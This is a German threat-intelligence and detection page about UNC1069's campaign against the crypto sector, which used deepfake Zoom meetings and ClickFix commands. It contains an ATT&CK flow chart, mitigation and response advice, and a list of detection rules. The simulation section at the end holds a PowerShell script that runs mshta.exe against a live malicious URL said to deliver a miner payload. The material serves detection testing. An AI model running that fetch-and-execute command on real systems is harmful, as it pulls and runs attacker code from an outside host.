UNC1069 Zielt mit Neuer Werkzeuge und KI-gestütztem Social Engineering auf die Kryptowährungsbranche
Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Die mit Nordkorea verbundenen UNC1069 haben ein Krypto-FinTech mit einem mehrstufigen Einbruch angegriffen, der aus AI-generierten Deepfake-Videos, kompromittierten Telegram-Konten und einem gefälschten Zoom-Meeting bestand, um die Opfer dazu zu bringen, schädliche Befehle auszuführen.
Untersuchung
Mandiant identifizierte sieben Malware-Familien auf einem macOS-Host, darunter die neu beobachteten SILENCELIFT, DEEPBREATH und CHROMEPUSH, sowie den bekannten Downloader SUGARLOADER. Die Kette begann mit einem ClickFix-ähnlichen Befehl, der eine Nutzlast von einer bösartigen Domain abrief, und durchlief dann Loader und Backdoors, die Anmeldedaten, Browserdaten und Messaging-Inhalte stahlen. Spätere Stadien nutzten modulare, im Speicher residierende Ausführung, um Festplattenspuren zu minimieren.
Eindämmung
Stärken Sie die Überprüfung über soziale Ingenieurskanäle, beschränken Sie die Ausführung von unsignierten Skripten und überwachen Sie anomalen Curl- oder mshta-Gebrauch. Erzwingen Sie auf macOS Code-Signatur- und Launch-Daemon-Kontrollen und überprüfen Sie TCC-Berechtigungen und native Nachrichten-Hostverzeichnisse auf unbekannte Dateien.
Reaktion
Isolieren Sie das Endgerät, bewahren Sie Befehlszeilen-Artefakte, finden Sie die bösartige Launch-Daemon-Plist und blockieren Sie alle identifizierten C2-Domänen. Setzen Sie Keychain-, Browser- und Telegram-Anmeldeinformationen zurück und führen Sie eine Durchsuchung nach verbleibenden Loadern durch. Überprüfen Sie betroffene Konten auf unbefugten Zugriff und koordinieren Sie die Eindämmung.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>Aktion</b> – <b>T1204.001 Benutzer Ausführung</b>: Bösartiger Link, geliefert über kompromittiertes Telegram-Konto und gefälschtes Zoom-Meeting<br/><b>Beschreibung</b>: Opfer kopierte und führte Befehlszeilen aus"] class action_initial_access action tool_telegram["<b>Werkzeug</b> – <b>Name</b>: Telegram (kompromittiert)<br/><b>Rolle</b>: Lieferungskanal für bösartigen Link"] class tool_telegram tool tool_zoom["<b>Werkzeug</b> – <b>Name</b>: Zoom (gefälschtes Meeting)<br/><b>Rolle</b>: Soziales Engineering Vehikel"] class tool_zoom tool action_execution_unix_shell["<b>Aktion</b> – <b>T1059.004 Unix Shell</b>: Curl-Befehl über zsh ausführen, um WAVESHAPER herunterzuladen<br/><b>Beschreibung</b>: Lädt Backdoor herunter und führt ihn aus"] class action_execution_unix_shell action tool_curl["<b>Werkzeug</b> – <b>Name</b>: curl<br/><b>Zweck</b>: Remote-Nutzlast abrufen"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Name</b>: WAVESHAPER<br/><b>Funktion</b>: Backdoor heruntergeladen und ausgeführt"] class malware_waveshaper malware action_execution_mshta["<b>Aktion</b> – <b>T1218.005 Mshta Proxy Ausführung</b>: Mshta verwenden, um HYPERCALL-Downloader zu holen und auszuführen"] class action_execution_mshta action tool_mshta["<b>Werkzeug</b> – <b>Name</b>: mshta<br/><b>Zweck</b>: Remote-HTML-Anwendung ausführen"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Name</b>: HYPERCALL<br/><b>Funktion</b>: Downloader über mshta ausgeführt"] class malware_hypercall malware process_launch_daemon["<b>Prozess</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>Zweck</b>: Führt SUGARLOADER bei Systemstart aus"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Name</b>: SUGARLOADER<br/><b>Funktion</b>: Permanentes Komponente"] class malware_sugarloader malware action_defense_evasion["<b>Aktion</b> – <b>T1027.004 Kompilieren nach Lieferung</b>: Konfiguration mit RC4 verschlüsseln, um C2-URLs zu verbergen"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Name</b>: DEEPBREATH<br/><b>Fähigkeiten</b>: Greift auf Keychain und Browser-Speicher zu"] class malware_deepbreath malware action_cred_keychain["<b>Aktion</b> – <b>T1555.001 Keychain</b>: Anmeldedaten aus macOS Keychain extrahieren"] class action_cred_keychain action action_cred_browser["<b>Aktion</b> – <b>T1555.003 Web Browser</b>: Cookies, Anmeldungen, Erweiterungen aus Chrome Brave Edge extrahieren"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Name</b>: CHROMEPUSH<br/><b>Fähigkeit</b>: Browser-Erweiterungs-Keylogger"] class malware_chromepush malware action_keylogging["<b>Aktion</b> – <b>T1056.001 Keylogging</b>: Tastatureingaben über bösartige Erweiterung erfassen"] class action_keylogging action action_local_staging["<b>Aktion</b> – <b>T1074.001 Lokale Datenstaging</b>: Gesammelte Daten in temporären Verzeichnissen speichern"] class action_local_staging action action_remote_staging["<b>Aktion</b> – <b>T1074.002 Remote-Datenstaging</b>: Staging-Daten an C2 mit curl hochladen"] class action_remote_staging action action_c2_http["<b>Aktion</b> – <b>T1102.003 Web-Service Einweg</b>: Exfiltrierte Daten über HTTP POST senden"] class action_c2_http action action_exfiltration["<b>Aktion</b> – <b>T1020 Automatisierte Exfiltration</b>: Automatisiertes Hochladen von Daten an C2-Server"] class action_exfiltration action %% Connections action_initial_access –>|verwendet| tool_telegram tool_telegram –>|liefert Link zu| tool_zoom tool_zoom –>|führt zu| action_execution_unix_shell action_execution_unix_shell –>|führt aus| tool_curl tool_curl –>|lädt herunter| malware_waveshaper malware_waveshaper –>|triggert| action_defense_evasion action_initial_access –>|triggert auch| action_execution_mshta action_execution_mshta –>|verwendet| tool_mshta tool_mshta –>|holt| malware_hypercall malware_hypercall –>|installiert| process_launch_daemon process_launch_daemon –>|startet| malware_sugarloader malware_sugarloader –>|lädt| malware_deepbreath malware_deepbreath –>|führt aus| action_cred_keychain malware_deepbreath –>|führt aus| action_cred_browser malware_deepbreath –>|installiert| malware_chromepush malware_chromepush –>|führt aus| action_keylogging action_keylogging –>|speichert Daten in| action_local_staging action_local_staging –>|lädt über curl zu| action_remote_staging action_remote_staging –>|sammelt Daten zu| action_c2_http action_c2_http –>|erleichtert| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
Angriffsablauf
Erkennungen
Möglicher System_profiler-Abfrageversuch (via Prozess-Erstellung)
Ansicht
Verdächtiges LOLBAS MSHTA Verteidigungsumgehungsverhalten durch Erkennung verbundener Befehle (via Prozess-Erstellung)
Ansicht
Möglicher Systemupdate-Abfrageversuch (via Prozess-Erstellung)
Ansicht
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Ansicht
PnPtUtil zur Geräteabfrage (via cmdline)
Ansicht
Mögliche Systemabfrage (via cmdline)
Ansicht
IOCs (HashMd5), um zu erkennen: UNC1069 zielt mit neuen Werkzeugen und KI-fähigem Social Engineering auf den Cryptocurrency-Sektor
Ansicht
IOCs (HashSha256), um zu erkennen: UNC1069 zielt mit neuen Werkzeugen und KI-fähigem Social Engineering auf den Cryptocurrency-Sektor
Ansicht
UNC1069 MacOS Infektionsvektor via ClickFix [Linux Prozess-Erstellung]
Ansicht
UNC1069 ClickFix Angriffsbefehlsausführung [Windows Prozess-Erstellung]
Ansicht
Simulationsausführung
Voraussetzung: Der Telemetrie- & Baseline-Check vor dem Start muss bestanden sein.
Begründung: Dieser Abschnitt erläutert die präzise Ausführung der gegnerischen Technik (TTP), um die Erkennungsregel auszulösen. Die Befehle und Narrative MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die erwartete Telemetrie gemäß der Erkennungslogik zu erzeugen.
-
Angriffs-Erzählung & Befehle:
Der Angreifer, der sich bereits über eine Phishing-E-Mail Zugang verschafft hat, nutztmshta, um eine bösartige HTML-Anwendung vonhttps://mylingocoin.com/audio/fix/6454694440abzurufen. Diese HTA-Datei enthält eine PowerShell-Nutzlast, die einen Krypto-Mining-Miner installiert. Bevor das HTA gestartet wird, führt der Angreifersetx audio_volume 100aus, um sicherzustellen, dass das Audiosystem in einem bekannten Zustand ist (einige Varianten der ClickFix-Kampagne manipulieren Audiokonfigurationen, um Pop-ups zu verbergen). Beide Befehle werden direkt in einer PowerShell-Konsole ausgeführt, wodurch CommandLine-Felder erzeugt werden, die genau der Sigma-Regel entsprechen. -
Regressionstest-Skript:
# UNC1069 ClickFix-Angriffssimulation – löst Sigma-Regel aus # Schritt 1: Ein harmlos aussehendes Umgebungsvariable (übereinstimmt mit Erkennung) persistieren setx audio_volume 100 # Schritt 2: Bösartiges HTA ausführen – genau die URL, die in der Regel-Erkennung verwendet wird $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # Optional: ein paar Sekunden warten, bis das HTA gestartet ist Start-Sleep -Seconds 5 -
Befehle zur Bereinigung:
# Die zuvor gesetzte Umgebungsvariable entfernen reg delete "HKCUEnvironment" /v "audio_volume" /f # Alle verbleibenden mshta-Prozesse beenden, die durch den Test ausgelöst wurden Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force